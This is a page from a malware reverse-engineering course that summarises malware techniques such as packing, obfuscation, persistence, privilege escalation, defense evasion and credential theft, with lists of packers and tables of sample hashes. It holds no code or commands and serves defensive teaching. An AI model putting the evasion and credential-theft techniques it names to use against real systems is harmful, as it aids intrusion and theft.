--- layout: default permalink: /RE101/section2.1/ title: Malware Techniques --- [Go Back to Reverse Engineering Malware 101](https://securedorg.github.io/RE101/) # Section 2.1: Malware Techniques # The malware classes may exhibit one or more of the following techniques. [Mitre Att&ck](https://attack.mitre.org/wiki/Main_Page) framework provides a great reference for many of these techniques. ## Techniques Overview * [Compression](#compression) * [Obfuscation](#obfuscation) * [Persistence](#persistence) * [Privilege Escalation](#privilege-escalation) * [Defense Evasion](#defense-evasion) * [Credential Theft](#credential-theft) * [Reconnaissance](#recon) * [Lateral Movement](#lateral-movement) * [Execution](#execution) * [Collection](#collection) * [Exfiltration](#exfiltration) * [Command and Control](#command-and-control) --- ## Compression * Combining the compressed data with decompression code into a single executable * Runtime packers * Self extractive archives * List of packers * [Themida](http://www.oreans.com/themida.php) * [Armadillo](http://www.siliconrealms.com/armadillo.php) * [ASPack](http://www.aspack.com/aspack.html) * [ASPR (ASProtect)](http://www.aspack.com/asprotect32.html) * [BoxedApp Packer](http://www.boxedapp.com/boxedapppacker) * [CExe](http://www.scottlu.com/Content/CExe.html) * [dotBundle](http://www.dotbundle.com) * [Enigma Protector](http://www.enigmaprotector.com) * [EXE Bundle](http://www.webtoolmaster.com/exebundle.htm) * [EXE Stealth](http://www.webtoolmaster.com/exestealth.htm) * [eXPressor](http://www.cgsoftlabs.ro/express.html) * [FSG](http://xtreeme.prv.pl/) * [kkrunchy](http://www.farbrausch.de/~fg/kkrunchy/) * [MEW](https://web.archive.org/web/20070831063728/http://northfox.uw.hu/index.php?lang=eng&id=dev) * [MPRESS](http://www.matcode.com/mpress.htm) * [Obsidium](http://www.obsidium.de) * [PESpin](http://pespin.w.interia.pl) * [Petite](http://www.un4seen.com/petite) * [RLPack Basic](http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/RLPack-Basic-Edition.shtml) * [Smart Packer Pro](http://www.smartpacker.nl) * [Themida](http://www.oreans.com/themida.php) * [UPX](https://upx.github.io/) * [VMProtect](http://vmpsoft.com/products/vmprotect) * [XComp/XPack](http://soft-lab.de/JoKo) [Goto Top^](#techniques-overview) --- ## Obfuscation * Deliberate act of creating obfuscated code that is difficult for humans to understand * Plain text strings will appear as base64 or Xor * Malicious behavior will include junk functions or routines that do nothing to throw off the reverser. * Control-Flow Flattening * String Encryption ![alt text](https://securedorg.github.io/images/CodeObfuscation.gif "CodeObfuscation") ### Example Malware | Name | Hash | Link | | --- | --- | --- | | EXTRAC32.EXE | f4d9660502220c22e367e084c7f5647c21ad4821d8c41ce68e1ac89975175051 | [virustotal](https://www.virustotal.com/en/file/f4d9660502220c22e367e084c7f5647c21ad4821d8c41ce68e1ac89975175051/analysis/) | [Goto Top^](#techniques-overview) --- ## Persistence * Once malware gains access to a system, it often looks to be there for a long time. * If the persistence mechanism is unique enough, it can even serve as a great way to identify a given piece of malware. ![alt text](https://securedorg.github.io/images/Persistence.png "Persistence") Example: Dll Search Order Hijacking ![alt text](https://securedorg.github.io/images/DLLload.gif "Dll loading") ### Example Malware | Name | Hash | Link | | --- | --- | --- | | Banker Trojan| cb07ec66c37f43512f140cd470912281f12d1bc9297e59c96134063f963d07ff | [virustotal](https://www.virustotal.com/en/file/cb07ec66c37f43512f140cd470912281f12d1bc9297e59c96134063f963d07ff/analysis/) | [Goto Top^](#techniques-overview) --- ## Privilege Escalation * Exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. * Common Techniques: * Dll Search Order Hijacking * Dll injection * Exploiting a vulnerability * BufferOverflow * StackOverflow * Headspray * Return Orientated Programming (ROP) * Credential Theft * UAC Bypasses [Goto Top^](#techniques-overview) --- ## Defense Evasion * Evading detection or avoiding defenses. * Common Techniques: * Killing AV * Deleting itself after a run * Timebombs/Timestomping * Stolen Certificates * Dll Side Loading * Masquerading * Process Hallowing * Code Injection ### Example Malware | Name | Hash | Link | | --- | --- | --- | | darkcomet backdoor | 1be0ca062facda59239cc5621d0a3807a84ed7d39377041489b09d3870958fee | [virustotal](https://www.virustotal.com/en/file/1be0ca062facda59239cc5621d0a3807a84ed7d39377041489b09d3870958fee/analysis/) | [Goto Top^](#techniques-overview) --- ## Credential Theft * Going after password storage * Keylogging passwords * Screenshots Example: Mimikatz Credential theft ![alt text](https://securedorg.github.io/images/mimikatzElevate.png "Mimkatz Elevating") ### Example Malware | Name | Hash | Link | | --- | --- | --- | | mimikatz | b4d7bfcfb8f85c4d2fb8cb33c1d6380e5b7501e492edf3787adee42e29e0bb25 | [virustotal](https://www.virustotal.com/en/file/b4d7bfcfb8f85c4d2fb8cb33c1d6380e5b7501e492edf3787adee42e29e0bb25/analysis/) | [Goto Top^](#techniques-overview) --- ## Reconnaissance * Gain knowledge about the system and internal network. [Goto Top^](#techniques-overview) --- ## Lateral Movement * Enable an adversary to access and control remote systems on a network and could ### Example Malware | Name | Hash | Link | | --- | --- | --- | | winmail.dat^QGIS-KOMIT .zip^QGIS-KOMIT .exe | c0f38384dd6c1536a0e19100b8d82759e240d58ed6ba50b433e892e02e819ebb | [virustotal](https://www.virustotal.com/en/file/c0f38384dd6c1536a0e19100b8d82759e240d58ed6ba50b433e892e02e819ebb/analysis/) | [Goto Top^](#techniques-overview) --- ## Execution * Techniques that result in execution of adversary-controlled code on a local or remote system * scripts * post-exploitation [Goto Top^](#techniques-overview) --- ## Collection * Identify and gather information, such as sensitive files, from a target network prior to exfiltration ### Example Malware | Name | Hash | Link | | --- | --- | --- | | keylogger | 5d5c01d72216410767d089a3aabddf7fdbe3b88aff3b51b6d32280c3439038fa | [virustotal](https://www.virustotal.com/en/file/5d5c01d72216410767d089a3aabddf7fdbe3b88aff3b51b6d32280c3439038fa/analysis/) | [Goto Top^](#techniques-overview) --- ## Exfiltration * Removing files and information [Goto Top^](#techniques-overview) --- ## Command and Control * Communicate with systems under their control ### Example Malware | Name | Hash | Link | | --- | --- | --- | | backdoor | 02fc2d262cb0d5e9d3e8202ea69013c5c8cc197685c73c0689cbeb243d508e76 | [virustotal](https://www.virustotal.com/en/file/02fc2d262cb0d5e9d3e8202ea69013c5c8cc197685c73c0689cbeb243d508e76/analysis/) | [Goto Top^](#techniques-overview) [Malware Classes <- Back](https://securedorg.github.io/RE101/section2) | [Next -> Section 3](https://securedorg.github.io/RE101/section3)